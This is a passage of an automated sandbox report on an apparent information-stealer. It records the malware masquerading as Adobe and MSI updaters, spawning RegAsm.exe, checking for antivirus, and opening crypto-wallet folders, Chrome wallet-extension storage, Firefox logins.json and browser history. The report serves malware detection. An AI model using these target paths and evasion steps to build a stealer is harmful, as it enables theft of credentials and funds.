                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_00A14699 cpuid 0_2_00A14699
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeCode function: EnumSystemLocalesW,7_2_004F70F4
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeCode function: EnumSystemLocalesW,7_2_004F70A9
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeCode function: EnumSystemLocalesW,7_2_004F718F
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,7_2_004F721A
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeCode function: GetLocaleInfoW,7_2_004EF305
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeCode function: GetLocaleInfoW,7_2_004F746D
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeCode function: EnumSystemLocalesW,7_2_004EEDDF
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_004F7596
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,7_2_004F6E07
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeCode function: GetLocaleInfoW,7_2_004F769C
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,7_2_004F776B
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeCode function: EnumSystemLocalesW,9_2_00C070F4
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeCode function: EnumSystemLocalesW,9_2_00C070A9
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeCode function: EnumSystemLocalesW,9_2_00C0718F
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,9_2_00C0721A
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeCode function: GetLocaleInfoW,9_2_00BFF305
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeCode function: GetLocaleInfoW,9_2_00C0746D
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_00C07596
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeCode function: EnumSystemLocalesW,9_2_00BFEDDF
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeCode function: GetLocaleInfoW,9_2_00C0769C
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,9_2_00C06E07
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_00C0776B
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: EnumSystemLocalesW,17_2_00EA70F4
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: EnumSystemLocalesW,17_2_00EA70A9
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: EnumSystemLocalesW,17_2_00EA718F
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,17_2_00EA721A
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: GetLocaleInfoW,17_2_00E9F305
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: GetLocaleInfoW,17_2_00EA746D
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: EnumSystemLocalesW,17_2_00E9EDDF
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,17_2_00EA7596
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: GetLocaleInfoW,17_2_00EA769C
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,17_2_00EA6E07
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,17_2_00EA776B
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: EnumSystemLocalesW,20_2_00EA70F4
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: EnumSystemLocalesW,20_2_00EA70A9
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: EnumSystemLocalesW,20_2_00EA718F
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,20_2_00EA721A
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: GetLocaleInfoW,20_2_00E9F305
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: GetLocaleInfoW,20_2_00EA746D
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: EnumSystemLocalesW,20_2_00E9EDDF
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,20_2_00EA7596
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: GetLocaleInfoW,20_2_00EA769C
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,20_2_00EA6E07
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,20_2_00EA776B
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeCode function: 7_2_004E4C60 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_004E4C60
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_00AA623D GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,0_2_00AA623D
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.15.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.15.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.15.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.15.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: RegAsm.exe, 00000008.00000002.2350449893.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000015.00000002.2456519007.0000000001505000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000019.00000002.2498499806.0000000000C1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: Amcache.hve.15.drBinary or memory string: MsMpEng.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6472, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5920, type: MEMORYSTR
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 500, type: MEMORYSTR
                  Source: Yara matchFile source: 00000000.00000003.2155682026.0000000006044000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2259208520.000000000611B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: tMO4FVIc9l.exe PID: 3108, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\KBHGMwjOItm_DLNJJFRnML7.zip, type: DROPPED
                  Source: RegAsm.exe, 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets
                  Source: RegAsm.exe, 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                  Source: RegAsm.exe, 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.0000000001548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: v\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.0000000001548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: v\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: RegAsm.exe, 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                  Source: RegAsm.exe, 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                  Source: RegAsm.exe, 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                  Source: RegAsm.exe, 0000000C.00000002.2244993517.000000000118F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ledger Live
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
